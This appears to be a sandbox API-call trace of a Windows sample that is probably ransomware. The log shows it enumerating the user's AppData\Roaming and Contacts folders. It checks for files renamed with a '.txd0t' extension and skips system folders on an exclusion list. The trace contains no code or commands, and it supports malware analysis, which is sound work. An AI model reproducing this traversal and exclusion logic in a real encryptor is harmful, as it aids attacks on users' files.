StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="SKsJaHK4avL.odp.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp.txd0t" [0119.288] PathFindExtensionW (pszPath="SKsJaHK4avL.odp.txd0t") returned=".txd0t" [0119.288] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.288] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Skype", cAlternateFileName="")) returned 1 [0119.288] StrCmpW (psz1="Skype", psz2=".") returned 1 [0119.288] StrCmpW (psz1="Skype", psz2="..") returned 1 [0119.288] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.288] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.288] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Skype", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype" [0119.288] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\windows\\system32\\") returned 0x0 [0119.288] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.288] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\windows\\system\\") returned 0x0 [0119.288] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.288] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype", lpSrch="\\appdata\\roaming\\") returned="\\AppData\\Roaming\\Skype" [0119.288] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbe46ce0, ftCreationTime.dwHighDateTime=0x1d5e3af, ftLastAccessTime.dwLowDateTime=0xab0ee800, ftLastAccessTime.dwHighDateTime=0x1d5e1c7, ftLastWriteTime.dwLowDateTime=0x50556d6e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13735, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="sT1K.flv.txd0t", cAlternateFileName="ST1KFL~1.TXD")) returned 1 [0119.288] StrCmpW (psz1="sT1K.flv.txd0t", psz2=".") returned 1 [0119.288] StrCmpW (psz1="sT1K.flv.txd0t", psz2="..") returned 1 [0119.288] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.288] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.288] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="sT1K.flv.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv.txd0t" [0119.288] PathFindExtensionW (pszPath="sT1K.flv.txd0t") returned=".txd0t" [0119.288] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.288] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad2cc5cd, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xad2cc5cd, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xad2cc5cd, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0119.288] StrCmpW (psz1="Sun", psz2=".") returned 1 [0119.288] StrCmpW (psz1="Sun", psz2="..") returned 1 [0119.289] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.289] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.289] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Sun", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun" [0119.289] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\windows\\system32\\") returned 0x0 [0119.289] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.289] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\windows\\system\\") returned 0x0 [0119.289] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.289] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", lpSrch="\\appdata\\roaming\\") returned="\\AppData\\Roaming\\Sun" [0119.289] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4573a5c0, ftCreationTime.dwHighDateTime=0x1d5e5a1, ftLastAccessTime.dwLowDateTime=0xf0e99590, ftLastAccessTime.dwHighDateTime=0x1d5e434, ftLastWriteTime.dwLowDateTime=0x5057e259, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16ff9, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="U6XvU G.bmp.txd0t", cAlternateFileName="U6XVUG~1.TXD")) returned 1 [0119.289] StrCmpW (psz1="U6XvU G.bmp.txd0t", psz2=".") returned 1 [0119.289] StrCmpW (psz1="U6XvU G.bmp.txd0t", psz2="..") returned 1 [0119.289] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.289] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.289] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="U6XvU G.bmp.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp.txd0t" [0119.289] PathFindExtensionW (pszPath="U6XvU G.bmp.txd0t") returned=".txd0t" [0119.289] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.289] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3606c4c0, ftCreationTime.dwHighDateTime=0x1d5ef90, ftLastAccessTime.dwLowDateTime=0xd600a6e0, ftLastAccessTime.dwHighDateTime=0x1d5e99a, ftLastWriteTime.dwLowDateTime=0x5057e259, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x242a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="U9jIHqltNvJBusuu8M.m4a.txd0t", cAlternateFileName="U9JIHQ~1.TXD")) returned 1 [0119.289] StrCmpW (psz1="U9jIHqltNvJBusuu8M.m4a.txd0t", psz2=".") returned 1 [0119.289] StrCmpW (psz1="U9jIHqltNvJBusuu8M.m4a.txd0t", psz2="..") returned 1 [0119.289] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.289] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.289] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="U9jIHqltNvJBusuu8M.m4a.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a.txd0t" [0119.289] PathFindExtensionW (pszPath="U9jIHqltNvJBusuu8M.m4a.txd0t") returned=".txd0t" [0119.289] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.289] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa572ba20, ftCreationTime.dwHighDateTime=0x1d5f0f9, ftLastAccessTime.dwLowDateTime=0xcfd02e20, ftLastAccessTime.dwHighDateTime=0x1d5e419, ftLastWriteTime.dwLowDateTime=0x505a3185, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1638f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="uBqsl.png.txd0t", cAlternateFileName="UBQSLP~1.TXD")) returned 1 [0119.289] StrCmpW (psz1="uBqsl.png.txd0t", psz2=".") returned 1 [0119.289] StrCmpW (psz1="uBqsl.png.txd0t", psz2="..") returned 1 [0119.289] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.289] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.291] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="uBqsl.png.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png.txd0t" [0119.291] PathFindExtensionW (pszPath="uBqsl.png.txd0t") returned=".txd0t" [0119.291] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.291] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9667b070, ftCreationTime.dwHighDateTime=0x1d5edbc, ftLastAccessTime.dwLowDateTime=0x56e267f0, ftLastAccessTime.dwHighDateTime=0x1d5e25a, ftLastWriteTime.dwLowDateTime=0x506158a9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12c1, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="UFfU-NQWoB7XyHy.mp3.txd0t", cAlternateFileName="UFFU-N~1.TXD")) returned 1 [0119.291] StrCmpW (psz1="UFfU-NQWoB7XyHy.mp3.txd0t", psz2=".") returned 1 [0119.291] StrCmpW (psz1="UFfU-NQWoB7XyHy.mp3.txd0t", psz2="..") returned 1 [0119.291] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.291] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.291] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="UFfU-NQWoB7XyHy.mp3.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3.txd0t" [0119.291] PathFindExtensionW (pszPath="UFfU-NQWoB7XyHy.mp3.txd0t") returned=".txd0t" [0119.291] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.291] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c250f10, ftCreationTime.dwHighDateTime=0x1d5e8f7, ftLastAccessTime.dwLowDateTime=0xbec39840, ftLastAccessTime.dwHighDateTime=0x1d5ea15, ftLastWriteTime.dwLowDateTime=0x5063bb10, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x14b23, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="wL6CtWVaL-45s.odp.txd0t", cAlternateFileName="WL6CTW~1.TXD")) returned 1 [0119.291] StrCmpW (psz1="wL6CtWVaL-45s.odp.txd0t", psz2=".") returned 1 [0119.291] StrCmpW (psz1="wL6CtWVaL-45s.odp.txd0t", psz2="..") returned 1 [0119.291] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.291] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.291] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="wL6CtWVaL-45s.odp.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp.txd0t" [0119.291] PathFindExtensionW (pszPath="wL6CtWVaL-45s.odp.txd0t") returned=".txd0t" [0119.291] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.291] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4d4ae90, ftCreationTime.dwHighDateTime=0x1d5ec00, ftLastAccessTime.dwLowDateTime=0xd8987d80, ftLastAccessTime.dwHighDateTime=0x1d5ee34, ftLastWriteTime.dwLowDateTime=0x5063bb10, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x8c81, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="XqhhUYjJL0U.rtf.txd0t", cAlternateFileName="XQHHUY~1.TXD")) returned 1 [0119.292] StrCmpW (psz1="XqhhUYjJL0U.rtf.txd0t", psz2=".") returned 1 [0119.292] StrCmpW (psz1="XqhhUYjJL0U.rtf.txd0t", psz2="..") returned 1 [0119.292] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.292] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.292] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="XqhhUYjJL0U.rtf.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf.txd0t" [0119.292] PathFindExtensionW (pszPath="XqhhUYjJL0U.rtf.txd0t") returned=".txd0t" [0119.292] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.292] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51c144d0, ftCreationTime.dwHighDateTime=0x1d5e507, ftLastAccessTime.dwLowDateTime=0x74880b60, ftLastAccessTime.dwHighDateTime=0x1d5ee68, ftLastWriteTime.dwLowDateTime=0x50661db2, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11897, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="YDXeffFC99vGn.mp3.txd0t", cAlternateFileName="YDXEFF~1.TXD")) returned 1 [0119.292] StrCmpW (psz1="YDXeffFC99vGn.mp3.txd0t", psz2=".") returned 1 [0119.292] StrCmpW (psz1="YDXeffFC99vGn.mp3.txd0t", psz2="..") returned 1 [0119.292] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.292] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.292] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="YDXeffFC99vGn.mp3.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3.txd0t" [0119.292] PathFindExtensionW (pszPath="YDXeffFC99vGn.mp3.txd0t") returned=".txd0t" [0119.292] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.292] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x200ac2e0, ftCreationTime.dwHighDateTime=0x1d5e80e, ftLastAccessTime.dwLowDateTime=0x7c772d80, ftLastAccessTime.dwHighDateTime=0x1d5e466, ftLastWriteTime.dwLowDateTime=0x50661db2, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18dc9, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Yjcpzl.ppt.txd0t", cAlternateFileName="YJCPZL~1.TXD")) returned 1 [0119.292] StrCmpW (psz1="Yjcpzl.ppt.txd0t", psz2=".") returned 1 [0119.292] StrCmpW (psz1="Yjcpzl.ppt.txd0t", psz2="..") returned 1 [0119.292] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.292] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.292] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Yjcpzl.ppt.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt.txd0t" [0119.292] PathFindExtensionW (pszPath="Yjcpzl.ppt.txd0t") returned=".txd0t" [0119.292] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.292] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75c97fc0, ftCreationTime.dwHighDateTime=0x1d5edde, ftLastAccessTime.dwLowDateTime=0x41dc0ad0, ftLastAccessTime.dwHighDateTime=0x1d5ed1a, ftLastWriteTime.dwLowDateTime=0x50687e9d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf01f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="_ZxYRX.rtf.txd0t", cAlternateFileName="_ZXYRX~1.TXD")) returned 1 [0119.292] StrCmpW (psz1="_ZxYRX.rtf.txd0t", psz2=".") returned 1 [0119.293] StrCmpW (psz1="_ZxYRX.rtf.txd0t", psz2="..") returned 1 [0119.293] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0119.293] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0119.293] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="_ZxYRX.rtf.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf.txd0t" [0119.293] PathFindExtensionW (pszPath="_ZxYRX.rtf.txd0t") returned=".txd0t" [0119.293] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.293] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75c97fc0, ftCreationTime.dwHighDateTime=0x1d5edde, ftLastAccessTime.dwLowDateTime=0x41dc0ad0, ftLastAccessTime.dwHighDateTime=0x1d5ed1a, ftLastWriteTime.dwLowDateTime=0x50687e9d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf01f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="_ZxYRX.rtf.txd0t", cAlternateFileName="_ZXYRX~1.TXD")) returned 0 [0119.293] FindClose (in: hFindFile=0xec19b0 | out: hFindFile=0xec19b0) returned 1 [0119.293] GetProcessHeap () returned 0xe30000 [0119.293] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.293] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x50687e9d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x50687e9d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0119.293] FindClose (in: hFindFile=0xec1930 | out: hFindFile=0xec1930) returned 1 [0119.293] GetProcessHeap () returned 0xe30000 [0119.293] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.293] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0119.293] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0119.293] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0119.293] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd43ecce6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2cb2cd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0119.293] StrCmpW (psz1="Contacts", psz2=".") returned 1 [0119.293] StrCmpW (psz1="Contacts", psz2="..") returned 1 [0119.293] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0119.293] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0119.293] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Contacts", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Contacts") returned="C:\\Users\\FD1HVy\\Contacts" [0119.293] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\windows\\system32\\") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\windows\\system\\") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\appdata\\local\\") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\boot\\") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\perflogs\\") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\programdata\\") returned 0x0 [0119.294] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\drivers\\") returned 0x0 [0119.294] StrStrIW 